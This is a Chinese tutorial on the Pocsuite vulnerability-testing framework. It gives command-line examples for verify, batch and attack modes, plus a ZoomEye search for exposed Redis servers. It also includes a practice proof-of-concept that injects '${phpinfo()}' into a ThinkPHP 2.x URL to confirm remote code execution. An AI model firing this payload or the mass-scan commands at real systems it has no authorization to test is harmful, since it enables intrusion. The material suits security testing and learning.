Pocsuite使用教程
1.常用命令
# Verify验证模式(-r 后面跟 poc 脚本路径)
python cli.py -r pocs/test1.py -u http://127.0.0.1 --verify
# 批量验证
python cli.py -r pocs/test1.py -f url.txt --verify
# 加载文件夹下所有的poc对目标进行测试
python cli.py -r pocs/* -u http://127.0.0.1 --verify
# 使用多线程
python cli.py -r pocs/* -u https://127.0.0.1 --verify --threads 10
# 使用ZoomEye搜索引擎,搜索开放端口为6379的Redis服务
python cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page 2
# Attack模式,向目标发起有效攻击
python pocsuite.py -r pocs/(poc脚本路径) -u https://127.0.0.1 --attack
2.poc编写
from pocsuite3.api import Output, POCBase,register_poc,requests,logger
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
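class DemoPOC(POCBase):
    """Practice PoC that checks a target for the ThinkPHP 2.x code-execution issue.

    The class attributes are the metadata fields of the PoC; several of them
    (vulID, references, appName, appVersion, samples) are left empty in this
    exercise. Only a verification check is implemented: it requests a URL
    whose path embeds ``${phpinfo()}`` and looks for phpinfo output in the
    response.
    """

    vulID = ''
    version = '1'
    author = 'wcs'
    vulDate = '2022-04-16'
    createDate = '2022-04-16'
    updateDate = '2022-04-16'
    references = []
    name = 'thinkphp 2-rce 任意代码执行漏洞'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = '任意代码执行'
    desc = '''
练习pocsuite
'''
    samples = []
    install_requires = []

    def _verify(self):
        """Send one GET request and report whether phpinfo output came back.

        Returns:
            The ``Output`` object, marked successful with a ``VerifyInfo``
            entry when the response is 200 and contains "PHP Version",
            otherwise marked failed.
        """
        output = Output(self)
        result = {}
        payload = "/index.php?s=/index/index/name/${phpinfo()}"
        # A target given as "http://host/" would otherwise produce "//index.php".
        base_url = self.url.rstrip('/')
        try:
            resp = requests.get(base_url + payload)
            # NOTE(review): matching the literal "PHP Version" also succeeds on
            # any page that merely prints that text, so a positive result
            # should be confirmed manually before it is reported.
            if resp and resp.status_code == 200 and "PHP Version" in resp.text:
                # 'Name' carries the request path used for the check; the key
                # is kept as-is so existing report consumers see the same shape.
                result['VerifyInfo'] = {
                    'URL': self.url,
                    'Name': payload,
                }
        except Exception as exc:
            # Stay best-effort (an unreachable host is reported as "not
            # vulnerable"), but record why, so a network or TLS failure is not
            # mistaken for a clean negative.
            logger.warning('request to %s failed: %s', self.url, exc)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Run the same check as ``_verify``; no separate attack logic exists."""
        return self._verify()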
# Hand the PoC class to pocsuite3 so the framework can load and run it.
register_poc(DemoPOC)